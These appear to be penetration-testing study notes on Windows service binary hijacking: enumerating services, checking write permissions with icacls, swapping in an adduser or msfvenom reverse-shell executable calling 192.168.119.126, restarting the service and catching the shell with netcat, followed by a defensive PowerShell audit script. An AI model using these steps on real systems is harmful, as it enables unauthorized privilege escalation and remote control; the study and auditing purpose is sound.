Service Binary hijacking

  • Enumerate the programs run by scheduled tasks and by running services

    • schtasks /query /fo LIST /v

    • Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

  • Check the permissions (full control or write access) on each program found

    • icacls <full-path>

    • icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

  • Transfer an adduser.exe executable and rename it to the name of the exploitable exe

    • OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe

  • sc.exe stop <service-name>

  • sc.exe start <service-name>

  • nc -nvlp 139 if the reverse shell exe is used
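The enumeration and permission checks above, turned into a defender's audit (added here, not part of the original notes): it reports running services whose binary is writable by low-privileged principals and notes the icacls fix. Get-ServiceBinaryPath and the principal list are my own choices and assume an English Windows install.

```powershell
# Added audit script, not part of the original notes: flag running services whose
# binary can be replaced by low-privileged principals, which is the misconfiguration
# the hijack above relies on. Assumes an English Windows install (principal names
# below are not localized) and read access to the binaries' ACLs.

# Rights that allow replacing the file: WriteData, Delete, GENERIC_WRITE, GENERIC_ALL
$writeMask = 0x2 -bor 0x10000 -bor 0x40000000 -bor 0x10000000
$lowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted and carry arguments, e.g. "C:\App\svc.exe" -config x
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted: take everything up to and including the first .exe
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

$services = Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.State -eq 'Running' -and $_.PathName }

$findings = foreach ($svc in $services) {
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not (Test-Path -LiteralPath $bin)) { continue }
    foreach ($ace in (Get-Acl -LiteralPath $bin).Access) {
        $principal = $ace.IdentityReference.Value
        $rights = [int]$ace.FileSystemRights
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPrivPrincipals -contains $principal -and
            ($rights -band $writeMask) -ne 0) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName   # e.g. LocalSystem: a hijack here yields SYSTEM
                Binary    = $bin
                Principal = $principal
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
    # Fix each finding by replacing the principal's explicit grant with read/execute, e.g.
    #   icacls "<binary>" /grant:r "BUILTIN\Users:(RX)"
    # If the write right is inherited, run icacls "<binary>" /inheritance:d first.
} else {
    'No running service binaries are writable by low-privileged principals.'
}
```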
